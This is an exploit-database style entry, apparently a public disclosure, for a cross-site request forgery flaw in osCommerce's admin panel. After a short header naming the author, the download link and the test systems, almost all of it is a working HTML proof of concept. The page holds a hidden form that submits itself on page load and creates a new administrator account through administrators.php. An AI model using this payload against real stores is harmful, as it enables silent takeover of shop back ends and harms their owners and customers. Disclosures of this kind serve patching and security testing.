# Exploit Title: osCommerce Add Admin User CSRF Vulnerability # Exploit Author: Hesam Bazvand # Contact: Hesam.Bazvand1994@gmail.com # Download Link: https://www.oscommerce.com/Products&Download=oscom2341 # Tested on: Windows 10 / Kali Linux # Category: WebApps *#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# exploit: <html> <form name="administrator" action=" http://localhost/osCommerce/admin/administrators.php?action=insert" method="post"> <input type="hidden" name="username" value="secuser" /> <input type="hidden" name="password" value="Your" /> <input type="hidden" name="htaccess" value="false" /> <body name="administrator" onLoad="document.administrator.submit();"></body> </form> </html>